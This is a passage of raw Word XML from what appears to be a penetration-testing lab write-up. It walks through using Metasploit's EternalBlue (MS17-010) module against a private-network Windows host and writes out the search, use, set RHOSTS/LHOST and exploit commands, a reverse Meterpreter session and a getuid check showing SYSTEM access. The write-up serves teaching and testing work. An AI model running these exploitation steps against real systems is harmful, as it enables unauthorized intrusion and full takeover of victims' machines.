          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C168DA" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Indepth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C168DA" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan</w:t>
      </w:r>
      <w:r w:rsidR="00C168DA" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> of open ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E0FEE6" w14:textId="5CF182DF"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Based on all t</w:t>
      </w:r>
      <w:r w:rsidR="00D742AF" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00864C0E" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ese findings</w:t>
      </w:r>
      <w:r w:rsidR="00D742AF" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, we </w:t>
      </w:r>
      <w:r w:rsidR="004B1325" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>decided to</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> target</w:t>
      </w:r>
      <w:r w:rsidR="004B1325" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
      <w:r w:rsidR="004B1325" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> through port 139 and 445 by using</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the MS17-010 (EternalBlue) vulnerability as the main attack point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739F8B7A" w14:textId="77777777" w:rsidR="003B694D" w:rsidRPr="0022306B" w:rsidRDefault="003B694D" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19CB86CB" w14:textId="77777777" w:rsidR="00C168DA" w:rsidRPr="0022306B" w:rsidRDefault="00C168DA" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB6C3ED" w14:textId="77777777" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="00644BAF" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>.2 Phase Two: Vulnerability Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608737A2" w14:textId="77777777"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Based on the findings from the reconnaissance stage, we initiated the Metasploit framework, a powerful platform integrating a large number of known vulnerability exploitation modules, ready to launch an attack on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6E2834" w14:textId="77777777"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b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Locate and select the attack module. We use Metasploit's search function to look for available modules targeting MS17-010.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23093161" w14:textId="77777777" w:rsidR="00644BAF" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="004B1325">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Execute the </w:t>
      </w:r>
      <w:r w:rsidR="00644BAF" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>command: msf6 &gt; search ms17-010</w:t>
      </w:r>
      <w:r w:rsidR="00644BAF" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251654656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6CE349CB" wp14:editId="6692E542">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>19685</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>259715</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4650740" cy="3104515"/>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4.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4650740" cy="3104515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E10EBEA" w14:textId="2B276D01" w:rsidR="00C168DA" w:rsidRPr="0022306B" w:rsidRDefault="00C168DA" w:rsidP="00C168DA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 3. Metasploit search for modules that target </w:t>
      </w:r>
      <w:r w:rsidR="004B1325" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>MS17-010</w:t>
      </w:r>
      <w:r w:rsidR="004B1325" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2861696F" w14:textId="77777777" w:rsidR="004B1325" w:rsidRPr="0022306B" w:rsidRDefault="004B1325" w:rsidP="00C168DA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B80B97" w14:textId="738E1D8F"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Step 2: Configure and execute the attack. We configured the parameters required for this module, including the target IP (RHOSTS) and the local IP (LHOST) used to receive reverse connections, and then initiated the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A15FEB" w14:textId="77777777" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msf6 &gt; use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE99FD4" w14:textId="77777777" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/ms17_010_eternalblue) &gt; set RHOSTS 192.168.4.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A5393F" w14:textId="77777777" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/ms17_010_eternalblue) &gt; set LHOST 192.168.4.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB5AE8F" w14:textId="2BA64E50" w:rsidR="00864C0E" w:rsidRPr="0022306B" w:rsidRDefault="00864C0E" w:rsidP="00864C0E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C720033" wp14:editId="26171C1F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1113790</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4254500" cy="225679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6.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4254500" cy="2256790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="004B1325" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sf6 exploit(windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004B1325" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B1325" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/ms17_010_eternalblue) &gt; exploit</w:t>
      </w:r>
      <w:r w:rsidR="004B1325" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251655680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0B58529C" wp14:editId="179A89FE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>361293</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4222750" cy="800100"/>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5a.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4222750" cy="800100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3DE016" w14:textId="19CE0580" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="004B1325" w:rsidP="00864C0E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4. Configuring and executing the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploitation attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCA6F0E" w14:textId="3DD9360B" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="00644BAF" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1CD18BF0" wp14:editId="2DF22ACA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>585375</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4527550" cy="965200"/>
            <wp:effectExtent l="0" t="0" r="635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7.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4527550" cy="965200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>We obtained a Meterpreter session. To confirm our permission level, we immediate</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ly execut</w:t>
      </w:r>
      <w:r w:rsidR="007C32C0" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007C32C0" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> below (fig. 5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419255E4" w14:textId="743019F1" w:rsidR="004B1325" w:rsidRPr="0022306B" w:rsidRDefault="004B1325" w:rsidP="00CB49D5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00CB49D5" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CB49D5" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> confirming permissions with “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CB49D5" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CB49D5" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D13355E" w14:textId="72E208B9"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This result</w:t>
      </w:r>
      <w:r w:rsidR="00E0344B" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> shown in fig. 5 confirmed our most optimistic predictions</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. We have obtained the supreme SYSTEM permission in the Windows system and can perform any operation on the system, which is equivalent to having full physical access to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBE8D5A" w14:textId="77777777" w:rsidR="00E0344B" w:rsidRPr="0022306B" w:rsidRDefault="00E0344B" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
